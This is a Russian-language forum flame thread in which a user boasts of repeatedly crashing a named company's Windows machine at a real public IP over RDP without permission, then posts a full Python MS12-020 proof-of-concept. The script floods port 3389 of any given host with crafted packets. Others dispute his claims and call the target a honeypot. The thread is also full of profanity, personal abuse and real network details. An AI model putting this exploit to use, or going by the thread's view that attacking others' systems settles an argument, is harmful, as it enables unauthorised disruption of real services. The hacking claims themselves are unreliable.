Самый прикол, что наш рехтур п№здит. Я ему дал корпоративный ИП компании-партнера нашего, так что п№здит он тебе нагло, почему - я написал тебе выше. Особенно убило про бырявое RDP. О! Мне их айтишники прислали и проосили передать:

Цитата:
передай этому сказочному долбоебу, чтобы свою дырку в голове между ушей заклеил

.
Эххх а теперь песня:
Ректор едет, ректор мчится из теухи утром ранним,
И отчаянно похачит ненавистную винду
Ты узнаешь что ВНЕЗАПНО RDP у нас дырявый
И AD у нас корявый
Я те честно га-ва-рюююю!
Ректор, лучше ломай странички на narod.ru, если ума хватит после удаления мозга гиперболойдом.

pavel2403 написал:
Просто как ты будешь без монтирования каталога с файлами на NFS фильму то смотреть без самбы по сети

А зачем выдумывать лишние ограничения в виде запрета монтирования папок? Самбу вообще-то тоже обычно монтируют, чтобы можно было полазить по папочке тем же тоталом/фаром, и оттуда уже запустить фильм/музыку

Только вот смотреть прямо с самбы - не очень увлекательное занятие. Помню, как тормозили компы в общаговской сети, когда с них напрямую что-то смотреть пытались

Нормально все, ничего личного:

http://securityvulns.ru/news/Microsoft/Office/WPS.html
http://securityvulns.ru/news/Microsoft/Windows/1204.html
http://securityvulns.ru/news/Microsoft/UAG/IL.html
http://securityvulns.ru/news/Microsoft/IE/1204.html

x999, что-то я не уловил. Есть 4 уязвимости, на момент публикации информации о которых патчи уже были в наличии. Это была реклама оперативности работы службы поддержки продуктов MS, штоле?

Skynet2015 написал:
Самый прикол, что наш рехтур п№здит. Я ему дал корпоративный ИП компании-партнера нашего, так что п№здит он тебе нагло, почему - я написал тебе выше. Особенно убило про бырявое RDP. О! Мне их айтишники прислали и проосили передать:
Цитата:
передай этому сказочному долбоебу, чтобы свою дырку в голове между ушей заклеил

Ты мудило, Кай. И я тебе это уже говорил. Ты тут что дал? Некий фейк -)) В итоге, засветил сетушку в которой есть некий дырявый хост, сам обосрался по полной, когда тебе указали что это вообще роутер этой сетушки. А никак не твоя машина. Вот ты чмо, бля...
--
Ну а по поводу машинки дырявой по RDP, еще 4 часа назад она ложилась и ноги раздвигала....

Белая рысь написал:
А тут вон скока всего, при чём, всё это поднял какой-то школьник, даже не отключивший общие папки наружу. =))

Так вот я прикалываюсь -)) Искал машины с уязвимой самбой...но на фоне виндовых машин их найти трудно =)

Rector написал:
В итоге, засветил сетушку в которой есть некий дырявый хост, сам обосрался по полной, когда тебе указали что это вообще роутер этой сетушки. А никак не твоя машина. Вот ты чмо, бля...

ыыыыы, какой попаболь рехтур, какой попаболь!

Rector написал:
Ну а по поводу машинки дырявой по RDP, еще 4 часа назад она ложилась и ноги раздвигала....

ну не п№зди, нинада, тебе все равно не верят тут вообще никто. Из тебя такой специалист, как из меня балалаешник. Давай еще про п телефонию вспомним итеде.

Skynet2015, IP машинки в студию выложить?
---
Не ну б..дь ты и долб..б! Сетушку засветил, фейковал тут чё то...Надо по ходу тебя твоим безопасникам сдать...
--
Так IP машинки выложить?
++
Учти, тут с 1000 челов сейчас это читают. Пи...ц сетушке может настать. И виноват будешь ты -))

Rector написал:
Ну а по поводу машинки дырявой по RDP, еще 4 часа назад она ложилась и ноги раздвигала....

Rector, простите, но позволю себе усомниться... Не вижу основания, для себя, верить Вам на слово в этом вопросе. Понимаете как получается... Или Вы предоставляете доказательства того, что Вы взломали в той сети хоть какую-то машину - т.е. обосновываете свои слова, или любой так же может сказать, что взломал лично Вашу машину, под линуксом она или нет - будет не важно.

Rector написал:
Так IP машинки выложить?

хм... А что даст IP компа? То, что он в сети существует? Ну это понятно, дальше-то что?

kenzzzooo, так УК РФ ещё никто не отменял. Так что...тут приводить доказательства что машина в сети 194.190.10.0/24 валится от одного чиха, я не буду. Единственное что могу сказать - что порт 3389 на этой машине 194.190.10.214 уязвим в данный момент.

Rector написал:
Так IP машинки выложить?

Rector написал:
Skynet2015, IP машинки в студию выложить?

у выложи-выложи. Спорим она будет начинатся со 192.168....
Не бесись ты таг, теушный спец. Аж 2 раза от злости напейсал.

Rector написал:
Не ну б..дь ты и долб..б! Сетушку засветил, фейковал тут чё то...Надо по ходу тебя твоим безопасникам сдать...

Сдай, я правда сам в СБ, ну ты сдай-сдай.

Rector написал:
Учти, тут с 1000 челов сейчас это читают. Пи...ц сетушке может настать. И виноват будешь ты -))

Да что-то со вчерашнего дня не настал, странно, да? Может этот выебон и пустой понт тут никому кроме тебя не нужен?

Rector написал:
kenzzzooo, так УК РФ ещё никто не отменял. Так что...тут приводить доказательства что машина в сети 194.190.10.0/24 валится от одного чиха, я не буду. Единственное что могу сказать - что порт 3389 на этой машине 194.190.10.214 уязвим в данный момент.

Уже мимо. Нету у нас такой машинки с адресом 194.190.10.0, вообще нет. Опять пальцем в жопу.

Skynet2015 написал:
я правда сам в СБ

Да!? А я думал ты шагающие трансформаторы делаешь -)) Не?

Rector написал:
Да!? А я думал ты шагающие трансформаторы делаешь -)) Не?

Да иты меньше думай, больше делай, так пруфы будут какир-недоучка?

Skynet2015 написал:
так пруфы будут

От меня нет. Просто машинка эта 194.190.10.214 сегодня ноги раздвинула раз 20 =)) Кто там у тебя на ней работает? Может ты сам? И как тебе ребуты? Понравились? -)
===
Ещё раз, пря счас? =))

Skynet2015 написал:
сам в СБ

Застрелись.
===
Как ты это допустил? Мудак!

Rector, эм, а можете ли вы продемонстрировать хотя бы скриншот с удалённой системы в подтверждение того, что факт взлома действительно имеет место?

Rector написал:
Ещё раз, пря счас? =))

давай прям сейчас.

Rector написал:
там у тебя на ней работает? Может ты сам? И как тебе ребуты? Понравились? -)

Еще раз для особо одаренных у нас нет такой машинки и диапазона.

Так что будем считать что понравилось

Rector написал:
Просто машинка эта 194.190.10.214 сегодня ноги раздвинула раз 20

Можете продемонстрировать это хотя бы логом данной машины?

SemyonKozakov написал:
Rector, эм, а можете ли вы продемонстрировать хотя бы скриншот с удалённой системы в подтверждение того, что факт взлома действительно имеет место?

Да никуя он не может этого продемонстрировать, Несуществующие диапазоны только ибо думает, что раз белый IP начинается со 194.... то и вся сеть аналогично. Гыыы. Тэушный какир ректор.

Rector написал:
Застрелись.
===
Как ты это допустил? Мудак!

Рехтур, а рехтур. Ну давай, ломай меня полностью, а то домой пора. Я ЖРАТ хочу.

Rector написал:

kenzzzooo, так УК РФ ещё никто не отменял. Так что...тут приводить доказательства что машина в сети 194.190.10.0/24 валится от одного чиха, я не буду. Единственное что могу сказать - что порт 3389 на этой машине 194.190.10.214 уязвим в данный момент.

Собственно, при чём здесь УК РФ? Ты действительно считаешь, что для победы в споре "линух против винды" все методы хороши, вплоть до физического устранения оппонента? Тогда мне тебя искренне жаль, ибо ты жалкая ничтожная личность, неспособная что-то доказать не прибегая к насилию. Не будет на тебя заяву за этот взлом подавать, тем более, что всё равно неизвестно, кто ты и откуда. Имхо, все эти отмазки на УК - очередной твой слив.

Skynet2015 написал:
Рехтур, а рехтур. Ну давай, ломай меня полностью, а то домой пора. Я ЖРАТ хочу.

Чувствую, ты сегодня помрёшь с голоду...

SemyonKozakov, Кай сказал там Одминам, и они прикрылись УЖЕ. Ведь это твоя сетушка здесь, в 45 посте? Или ты вообще фейканул чмо, решив подставить уважаемую контору, EnergoStroyInvest-Holding JSC?
++
Забегали Одмины, да Кай! тАК КОМУ ТАМ ЗАШИВАТЬ ТО НАДО? =))

MOP3E написал:
Чувствую, ты сегодня помрёшь с голоду...

Неа, пойду я домой. Но специально для рехтура я поставлю машинку с ИП 194.190.10.214. Пусть ломает.

Rector, радует, что вы всё-таки продемонстрировали, что RIPN вы пользоваться умеете. Но если вы некоторое количество времени имели доступ к чужому серверу, неужели у вас не осталось никаких подтверждений этого?

Rector написал:
Забегали Одмины, да Кай! тАК КОМУ ТАМ ЗАШИВАТЬ ТО НАДО? =))

Хватит уже лужи газифицировать, ламерок. Нихр№на ты взломать не способен, опять обосрался.

SemyonKozakov написал:
Можете продемонстрировать это хотя бы логом данной машины?

А вот пусть Кай приведёт логи с той машинки -))
--
Ладно, виндузня! Нормально вас я сегодня погонял =))

Rector написал:
EnergoStroyInvest-Holding JSC

whois осилил? Молодец.
Нее, я же сказал, что это контора наших партнеров. А компов с диапазоном 194.190....... там вообще отродясь не было. Так что лечи батх№рт какир теушный. Слив засчитан.

Rector написал:
Кай сказал там Одминам, и они прикрылись УЖЕ

Конечно, прикрыли.

Ты п№зди-п№зди. Но не запежживайся. Логи то покажи как ты какировал.

SemyonKozakov написал:
Rector, радует, что вы всё-таки продемонстрировали, что RIPN вы пользоваться умеете. Но если вы некоторое количество времени имели доступ к чужому серверу, неужели у вас не осталось никаких подтверждений этого?

С чего бы им у него остаться, ведь "доступ" это всего лишь его с..суальные фантазии.

Rector написал:
Ладно, виндузня! Нормально вас я сегодня погонял =))

Да, обосрался ты сегодня зачотно. Надо будет как нибудь повторить.

MOP3E написал:
С чего бы им у него остаться, ведь "доступ" это всего лишь его с..суальные фантазии.

MOP3E написал:
Да, обосрался ты сегодня зачотно. Надо будет как нибудь повторить

Обосрался таки он зачетно, наш теушный какир.

SemyonKozakov, Семён, заявления некого Морзе, что типа никто меня сдавать не будет - я естественно не принимаю.
--
Ну а вообще...если интересно я как нибудь тебе в личку скину пруфы. Только не по данному случаю, а как нибудь по другим хостам. Работа у меня интересная и случаи бывают разные -)
===
Ну а Каю минус за тормоза. Айтишников сетушки 194.190.10.0/24 депремировать 100%
++
Спасибо за внимание! -)

Да, и умнику с бараном шепелявым - лечить жопку -)

Rector написал:
SemyonKozakov, Семён, заявления некого Морзе, что типа никто меня сдавать не будет - я естественно не принимаю.

Эм, погоди. Очевидно, что в логах ты можешь "замазать" все личные данные, оставив только содержательную часть. Очевидно, что даже если твой IP известен им, то, чтобы в России кого-то "вычислить по IP", придётся привлекать органы, работать с провайдером и.т.п. Ты думаешь, оно кому-то надо? Меня смущает то, что Skynet2015 явно намекает на отсутствие взлома, и кому верить в данной ситуации, непонятно.

Rector написал:
Ну а вообще...если интересно я как нибудь тебе в личку скину пруфы. Только не по данному случаю, а как нибудь по другим хостам. Работа у меня интересная и случаи бывают разные -)

Ну скинь мне в личку, скинь. Никому не покажу, обещаю.
Еще раз, у меня нет сети с таким диапазоном, она деже не пингуется, пруф см выше. А чем ты можешь доказать?

SemyonKozakov написал:
Меня смущает то, что Skynet2015 явно намекает на отсутствие взлома, и кому верить в данной ситуации, непонятно.

Да и я показал что машинки у нас, которую он типа ломанул. Она вообще не пингуется. Никак.

Rector написал:
Ладно, виндузня! Нормально вас я сегодня погонял =))

Пля. Сколько раз уже это было а? 2 Rector ну хотя бы скриншот взлома а ?

Rector написал:
так УК РФ ещё никто не отменял. Так что...тут приводить доказательства что машина в сети 194.190.10.0/24 валится от одного чиха, я не буду. Единственное что могу сказать - что порт 3389 на этой машине 194.190.10.214 уязвим в данный момент.

Ну, ну, нууууу... Это ж порт удаленного рабочего стола. Скиншот можно?

SemyonKozakov, Семён, тут же ситуация ясна. Кай не хочет признаваться что его поимели (а кто в этом признается), скрины, логи я не делал...Для меня это просто некая проходная х.йня, на которую я даже жалею дисковое пространство. Да забей! Я тебе скину как нибудь что по интересней -)

TrollWINNT написал:
Ну, ну, нууууу... Это ж порт удаленного рабочего стола. Скиншот можно?

неможно. Ты ды его спросил какой у нас DNS хоть. Просто самому интересно.

TrollWINNT, Да ладно -) Потом может ещё какой ухарь попадётся -))

Rector написал:
скрины, логи я не делал...

Rector написал:
Для меня это просто некая проходная х.йня

Rector написал:
я даже жалею дисковое пространство

Rector написал:
Да забей!

О как отмазываемся. Рехтур, а что ты скажешь о том, что та машинка вообще не пингуется. Ась? Или будешь игнорить этот скриншот?

2 Rector
Кстати, Skynet2015 давал адрес 194.190.10.251 с какого буя выполз 194.190.10.214 просветите плз?

Rector написал:
TrollWINNT, Да ладно -) Потом может ещё какой ухарь попадётся -))

Ну ты хоть скажи какой у нас шлюз для подсети, а? И я тогда признаю, что ты меня поломал.

TrollWINNT написал:
2 Rector
Кстати, Skynet2015 давал адрес 194.190.10.251 с какого буя выполз 194.190.10.214 просветите плз?

Oh meit G-tt! Он сломал нашего провайдера! ВОт сволочь, а я п#рнуху сегодня не докачал.

Skynet2015 написал:
а я п#рнуху сегодня не докачал.

Пипец! И чо теперь делать без неё будешь? Ну надо же так наср#ть человеку!
Rector, верни всё взад.

TrollWINNT написал:
Skynet2015 давал адрес 194.190.10.251 с какого буя выполз 194.190.10.214 просветите плз?

251 - это их корневой маршрутизатор (и вероятно шлюз в другие сети), 214 - это машинка под 7 виндой (prof). На ней были открыты нетбиоспорты, терминал...ну другая х.йня. После всего кипиша, Кай видимо позвонил тем самонадеянным и надутым индюкам, по названием "Одмины" и они там всю прикрыли. Да, теперь хост 194.190.10.214 даже не пингуется -)

MOP3E, TrollWINNT, SemyonKozakov, Ладно народ. Пойду я ЖРАТ домой. В общем жду пруфы рехтура.

Rector написал:
251 - это их корневой маршрутизатор (и вероятно шлюз в другие сети), 214 - это машинка под 7 виндой (prof). На ней были открыты нетбиоспорты, терминал...ну другая х.йня. После всего кипиша, Кай видимо позвонил тем самонадеянным и надутым индюкам, по названием "Одмины" и они там всю прикрыли. Да, теперь хост 194.190.10.214 даже не пингуется -)

Ладно рехтур, скажу я тебе всю правду - спешл фор ю сделали виртуальную мафынку ты ее ломал-ломал, даже не сломал. Успле влезть на нужный порт, да просто тебе сделали так что порты рандомно открываются-закрываются. Как говорится пальцем в жопу - дуракам везет. Потом надоели и закрыли. Удачи с дальнейшими взломами спешиалисть. Повесилил наш ИТ департамент хорошо.

Skynet2015, Ну ты кушай там спокойно.
Я просто тебе советую больше так не делать. Двурушник б...

Rector, Или что, мою виртуальную машинку сломаешь. Ты далпайоп ибо виртуалочку даже мозга не хватило сломать, а как пытался, как пытался. Ты же из за этого пруфов не сделал, признайся. И да, умение топ#рно сниффер врубать - это не символ профессионализма. Какие теушный. Тренируйся на narod.ru.

Skynet2015, Ну как тебе сказать Кай...Сейчас ты тут будешь себе попку мазать с HoneyPot' а, что-бы не болело -)) Это ты потом будешь, в следующий раз перед начальством объяснятся почему фин.директору комп сломали. Заодно будешь про медок отмазки лепить.
==
Не, ну я вообще в ах№е! И этот чмо работает в ИСБ?
Застрелись Кай -))

Короче, Кай! Пошел нах.й!

Rector, ну хотя бы о содержимом взломанной тобой машины и о твоих на ней действиях можешь рассказать? А то я окончательно запутался

SemyonKozakov написал:
Rector, ну хотя бы о содержимом взломанной тобой машины и о твоих на ней действиях можешь рассказать? А то я окончательно запутался

Да не может он ничего. Не ломал он нихр№на на самом деле. Я тоже отрубаюсь: купил сегодня новую видюху, буду устанавливать на комп. Усем пока!

SemyonKozakov, Семён, я же говорю - у меня полно своей работы. И копать машинку в гавносетке Кая, у меня просто не было времени...Честно. Так что я там и не лазил никуда. Просто ребутил её по RDP exploit...Раз наверное 20 -))

Rector, просто проблема в том, что ты заявляешь, что взломал что-то, Скайнет утверждает, что ничего взломано не было. И оба вы, ЧСХ, говорите абсолютно голосовно. Я хочу хотя бы понять, у какой из сторон есть пруфы на то, что взлом был\не был.

SemyonKozakov, Так пруфов не будет по двум причинам:
1.Я не хочу тут палево самому себе устраивать. Все же контора у Кая серьёзная.
2. Ка

* й не будет признаваться, ибо ему западло и стыдно что так его поимели. Отсюда и блеянье про медок -)

Rector написал:
Так что я там и не лазил никуда. Просто ребутил её по RDP exploit...Раз наверное 20 -))

Rector написал:
1.Я не хочу тут палево самому себе устраивать. Все же контора у Кая серьёзная.

Пля, я хр№нею с этого зоопарка . 2 Rector хоть бы уж детских то отмаз не лепили

Rector написал:
Просто ребутил её по RDP exploit...Раз наверное 20 -))

Ссылку на эксплоит?

TrollWINNT, Ладно, всё хватит. Мне тоже всё это надоело. Я спать...

Rector написал:
TrollWINNT, Ладно, всё хватит. Мне тоже всё это надоело. Я спать..

Что, даже ссылки на эксплоит не будет?

TrollWINNT, вот код на питоне...

#<br />#<br /># ms12-020 "chinese shit" PoC v2 (wireshark version)<br />#<br /># tested on winsp3 spanish, reported to work on Win7, win 2008<br /># <br /># original source: http://115.com/file/be27pff7<br />#<br />#<br /><br />import socket<br />import sys<br /><br />buf=""<br />buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19<br />buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224<br />buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470<br />buf+="\x02\xf0\x80" # ITU-T Rec X.224<br />buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125<br /><br />buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet<br />buf+="\x30\x19\x02\x04\x00\x00\x00\x00" <br />buf+="\x02\x04\x00\x00\x00\x02\x02\x04" <br />buf+="\x00\x00\x00\x00\x02\x04\x00\x00" <br />buf+="\x00\x01\x02\x04\x00\x00\x00\x00" <br />buf+="\x02\x04\x00\x00\x00\x01\x02\x02" <br />buf+="\xff\xff\x02\x04\x00\x00\x00\x02" <br />buf+="\x30\x19\x02\x04\x00\x00\x00\x01" <br />buf+="\x02\x04\x00\x00\x00\x01\x02\x04" <br />buf+="\x00\x00\x00\x01\x02\x04\x00\x00" <br />buf+="\x00\x01\x02\x04\x00\x00\x00\x00" <br />buf+="\x02\x04\x00\x00\x00\x01\x02\x02" <br />buf+="\x04\x20\x02\x04\x00\x00\x00\x02" <br />buf+="\x30\x1c\x02\x02\xff\xff\x02\x02" <br />buf+="\xfc\x17\x02\x02\xff\xff\x02\x04" <br />buf+="\x00\x00\x00\x01\x02\x04\x00\x00" <br />buf+="\x00\x00\x02\x04\x00\x00\x00\x01" <br />buf+="\x02\x02\xff\xff\x02\x04\x00\x00" <br />buf+="\x00\x02\x04\x82\x01\x33\x00\x05" <br />buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00" <br />buf+="\x08\x00\x10\x00\x01\xc0\x00\x44" <br />buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8" <br />buf+="\x00\x04\x00\x08\x00\x80\x02\xe0" <br />buf+="\x01\x01\xca\x03\xaa\x09\x04\x00" <br />buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f" <br />buf+="\x00\x53\x00\x54\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x04\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x0c\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x01\xca\x01\x00\x00\x00\x00" <br />buf+="\x00\x10\x00\x07\x00\x01\x00\x30" <br />buf+="\x00\x30\x00\x30\x00\x30\x00\x30" <br />buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" <br />buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" <br />buf+="\x00\x30\x00\x30\x00\x30\x00\x30" <br />buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" <br />buf+="\x00\x30\x00\x30\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c" <br />buf+="\x00\x0d\x00\x00\x00\x00\x00\x00" <br />buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00" <br />buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c" <br />buf+="\x00\x03\x00\x00\x00\x72\x64\x70" <br />buf+="\x64\x72\x00\x00\x00\x00\x00\x80" <br />buf+="\x80\x63\x6c\x69\x70\x72\x64\x72" <br />buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70" <br />buf+="\x73\x6e\x64\x00\x00\x00\x00\x00" <br />buf+="\xc0"<br /><br />buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12<br />buf+="\x02\xf0\x80"  # ITU-T Rec X.224<br />buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125<br />buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8<br />buf+="\x02\xf0\x80" # ITU-T Rec X.224<br />buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125<br />buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12<br />buf+="\x02\xf0\x80" # ITU-T Rec X.224<br />buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125<br />buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12<br />buf+="\x02\xf0\x80" #ITU-T Rec X.224<br />buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125<br />buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12<br />buf+="\x02\xf0\x80" #ITU-T Rec X.224<br />buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125<br />buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12<br />buf+="\x02\xf0\x80" #ITU-T Rec X.224<br />buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125<br />buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12<br />buf+="\x02\xf0\x80" #ITU-T Rec X.224<br />buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125<br />buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12<br />buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224<br /><br />HOST = sys.argv[1]<br />PORT = 3389<br />for i in range(1000):<br />	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />	s.connect((HOST,PORT))<br />	print "sending: %d bytes" % len(buf)<br />	s.send(buf)<br />	rec = s.recv(100)<br />	print "received: %d bytes" % len(rec)<br />	s.close()

Rector написал:
сидит некая машинка виндовая-серверок ;-) И что там только на ней нет -)) даже телефония поднята и DameWare и Microsoft Terminal Service. Рули не хочу

несколькими часами позже

Rector написал:
Единственное что могу сказать - что порт 3389 на этой машине 194.190.10.214 уязвим в данный момент.

Rector написал:
копать машинку в гавносетке Кая, у меня просто не было времени...Честно. Так что я там и не лазил никуда.

А потом просто типа переполнение буффера. Ты это определись, то ты мне ее 20 раз перезагрузил, то скриптом на питоне кунг-фу показал. Короче, завтра в 10.30 жду повторного взлома с пруфа, если не будет то ты п.здобол. И не отмазывайся больше так по детски.

Ректор, тебя пасодют, а ты не ломай! http://www.cnews.ru/news/top/index.shtml?2012/04/12/485454

Rector, простите, но, как говорил т. Станиславский, не верю :) После Вашего сообщения, в ответ мне, и первого указания адреса 194.190.10.214 я попробовал определить этот хост. Определение не удалось для: ping,tracert,nslookup,nmap. Принадлежность к той же сети, что и указанный Skynet2015 адрес, через whois подтвердилось, но это максимум, что удалось. Про проверку эксплоита на машине, которой тупо нет в сети, думаю говорить не надо, он бы ее тупо не нашел. Подключение через RDP также оказалось недоступным. Именно поэтому - не верю :)

kenzzzooo, после атак на эту машину и сообщениям Кая тамошним Одминам, данный хост был переведен или вообще в другую подсеть или что более вероятно, просто глухо закрыт фаерволлом. Логи я не вел, так что...Хотя мне откровенно всё равно - верите или не верите. Главное что у любителей пофейковать, типа "взломай меня по ойпи", думаю будет гораздо меньше желания давать левые адреса. Типа роутера провайдера и или подсети Пентагона -)
---
Думаю что на этом можно закончить и вернутся к обсуждении темы.

kenzzzooo написал:
Про проверку эксплоита на машине, которой тупо нет в сети, думаю говорить не надо, он бы ее тупо не нашел.

Честно, ты думаешь любую, даже виртуальную машинку в организации, где работают 10 000 человек, можно тупо уронить 20 раз через переполнение буффера? Вам это не кажется
kenzzzooo, Итак на 13.04.2012 на 10.59 мы имеем никуя. Вообще.
И на бис, для рехтура была создана даж виртуальная сеть, ибо:

Такого шлюза не существует в природе, можешь его пингануть, нмапить и др. И шлюзы в нашей организации сааавсем в другой подсети. DNS и маскуподсети полностью я говорить не буду, просто для инфы:

Так что звиняйте за устроенную клоунаду, НО теперь я понимаю что значит похачить по IP - это тупо:
1. Сказать всем на форуме, что он модет сломать любую машинку
2. Узнать белый IP на этом же форуме
3. Воспользоваться бездумно nmap, whois, сниффером, тупым скриптом для переполнения буффера
4. Получив х.й сказать всем что взломав, придумав МАССУ оправданий, почему он не запилил пруфов\
5. Пригрозить тому, кто дал белый IP, что сломает комп фин директора и досье покажет всем
6. ?????
7. PROFIT!!!111

Rector написал:
после атак на эту машину и сообщениям Кая тамошним Одминам, данный хост был переведен или вообще в другую подсеть или что более вероятно, просто глухо закрыт фаерволлом.

Солнце мое, скрины я привел тебе выше, что вообще таких машин в природе не существовало. Так что отмазывайся- не отмазывайся, увы тебе никто не поверит. Да, см - я тебе еще один белый IP дал. Давай ты не уронишь даже его, а просто приведешь логи, что на нем установлено, согласаен? Это не криминал и не уголовщина. IP пингуется. Ждемсс....

Skynet2015, не уверен, что так все просто можно сломать. Об этом, в общем-то, и говорю...

kenzzzooo написал:
Skynet2015, не уверен, что так все просто можно сломать. Об этом, в общем-то, и говорю...

Да сломать модно все что угодно, но не с помощью орудия малолетнего какира сниффер+переполнялка буффера. Я гарантирую это. Я вообще предлагаю нашему рехтуру, если он так палится взолма сказать как у нас называется имя почтового сервака корпоративного.Если скажет - значит он чего то стоит, если не скажет, то л..х и п.здобол.
Скрины того, что он сниффал виртуалку, я привел, ни шлюз не комп не пинггуется, странно да? Шлюз то должен пинговаться?

Skynet2015, Ты там совсем бизонами мозги вынес - это что за IP 194.190.10.0? Ты знаешь что он означает просто "начало сети" и ничего по этому IP пинговаться не может -) Очередной фейк -)
Потом даёшь некий скрин с адресами используемыми ТОЛЬКО в ЛОКАЛЬНЫХ сетях. Это к чему?
Блядь ты долб..б ещё хуже чем я ожидал. Ты просто больной.

Rector написал:
Блядь ты долб..б ещё хуже чем я ожидал. Ты просто больной.

Блядь, а по теме можешь чо нить сказать. Давай так, ты мне диапазон из 24 машинок дал, так. Говори любой IP который в сети 194.190.10.ХХ
Давай я начну:

И еще:

Skynet2015 написал:
Говори любой IP который в сети 194.190.10.ХХ

И что? Ты хочешь сказать что у тебя эта подсеть 194.190.10.ХХ не пингуется? И чо? -)) Обратись к администратору, я тут причем -))

Обновления на самбу пришли. Много.

Залатали.

Rector написал:
И что? Ты хочешь сказать что у тебя эта подсеть 194.190.10.ХХ не пингуется? И чо? -)) Обратись к администратору, я тут причем -))

Нене, она пингуется:

Я повторю свой вопрос, итак, вчера ты говорил, что на той мшинке и TS стоит и DMW и даже ип-телефония. Виртуалочка реально была слепком одной из машинок, так что названия почтовика ты дожен был узнать. Давай так - ты скажешь его название, а я признаю, что ты реально поломал (пусть и виртуалку) по белому IP. Согласен? Даю подсказку - слово из 4-х букв, но не mail. Час на это.

Skynet2015, извини но у меня рабочий день закончен -) Так что в следующий раз -)) И почтовика на той машине не было -)) Так что лечи пока жопку до понедельника -))

Rector написал:
Skynet2015, извини но у меня рабочий день закончен -) Так что в следующий раз -)) И почтовика на той машине не было -)) Так что лечи пока жопку до понедельника -))

ыыыыы. жопу пака лечишь пока что ты, а вот обмен с почтовиком был. Ну что, рехтур, признаешь слив?
Я тебе даже упрощу задачу, скажи DNS суффикс локальной сети. А часики тикают - если не скажешь - ну ты понел.

Да и Кай я уже убегаю, так что в следующий раз давай что поинтересней. Ваш почтовик esih.ru. Пока, будь здоров -)

Rector написал:
извини но у меня рабочий день закончен

Rector написал:
Так что в следующий раз

Rector написал:
Ваш почтовик esih.ru

Rector написал:
Кай я уже убегаю, так что в следующий раз давай что поинтересней

В общем вы поняли, нет, не esih.ru - это название сайта.Ну а название почтовика ну там xxxx.esih.ru. Время идет.

Rector -Очередной линупс взлом, особенно понравились моменты про финдиректора и раздвигание ног. А ребутили вы наверное машинку в своей учительской.
Бригада проктологов на подходе, если надо можно звякнуть чекистам,телефончик у меня лежит.Как раз им для отчета отлавливать надо таких хакиров

Ну что подведем итоги:
1. Мегахак рехтура - это nmap, whois, снифф, тупорылый ддос
2. Пруфов, что он хоть что-то сделал он так и не привел
3. Технично слился, пригрозив в понедельник хакнуть комп нашего финдира, а так же выложить на меня досье.
Рехтур, как попу вылечишь, ты это, заходи, я тебе еще один белый IP скину. Или даже 2, посмотрим что ты там наломаешь, а пока лечи батх№рт.

Rector написал:
Да и Кай я уже убегаю

Издалека слышен шум воды в унитазе...

Рехтур, расскажи пожалуйста - как можно взломать компьютер на спор, при этом не позаботившись получить какие либо доказательства взлома? Напрашивается два варианта: либо ты долб..б (так как не собрал никаких доказательств), либо ламер (так как нихр№на не взламывал, но всем тут поёшь песни про свою якобы крутость).

З.Ы. Видеокарта AMD HD3870 от Gigabyte - вторые сутки, полёт нормальный.

MOP3E, А теперь ВНИМАНИЕ, самый главный баттх№рт, на чем РЕАЛЬНО крутилась виртуалка, которую он хотел сломать:

Опплодисменты какиру!

Skynet2015 написал:
Опплодисменты какиру!

Билять какая жестокость с твоей стороны! А ждал конечно от тебя чего то подобного не зря ж ты адреса раздавал ( теперь будут отмазы про мифические роутеры на лине)
Это определенно номинация на звание-электроп№зд.н Slor и большая банка анального анестетика.
С нетерпением ждем следующих серий.

UPS написал:
Это определенно номинация на звание-электроп№зд.н Slor и большая банка анального анестетика.

